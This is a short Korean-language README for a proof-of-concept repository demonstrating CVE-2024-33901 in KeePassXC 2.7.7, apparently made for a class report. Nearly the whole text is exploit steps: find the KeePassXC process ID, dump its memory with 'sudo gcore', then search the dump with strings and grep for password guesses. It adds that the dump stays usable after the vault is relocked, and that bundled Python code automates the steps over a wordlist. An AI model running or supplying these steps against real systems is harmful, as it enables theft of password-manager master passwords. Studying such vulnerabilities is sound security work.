
KeePassXC 버전 2.7.7의 취약점 CVE-2024-33901을 시연하는 짧은 프로그램
KeePassXC 버전 2.7.7에서 CVE-2024-33901 취약점을 시연하는 짧은 프로그램
클래스 보고서에 소스 코드 링크가 필요할 수 있어서 이 저장소를 만들었습니다.
이 작업은 PID를 얻어서 수행할 수 있으며, 다음 명령어로 PID를 얻을 수 있습니다:
ps aux | grep keepassxc
그런 다음 다음 명령어를 실행합니다: sudo gcore -o keepassxc_dump PID_HERE
예를 들어, 얻은 PID가 1234라면 명령어는 다음과 같아야 합니다:
sudo gcore -o keepassxc_dump 1234
3. 마지막으로 다음 명령어를 실행할 수 있습니다: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
따라서 PID가 1234라면 명령어는 다음과 같습니다:
cat keepassxc_dump.1234 | strings | grep "password guess here"
메모리 덤프 파일이 생성되면 데이터베이스가 다시 잠기거나 KeePassXC가 종료되어도 공격을 수행할 수 있습니다.
제공된 Python 코드는 이러한 모든 단계를 수행하며, 제공된 텍스트 파일을 기반으로 여러 비밀번호 추측을 시도합니다.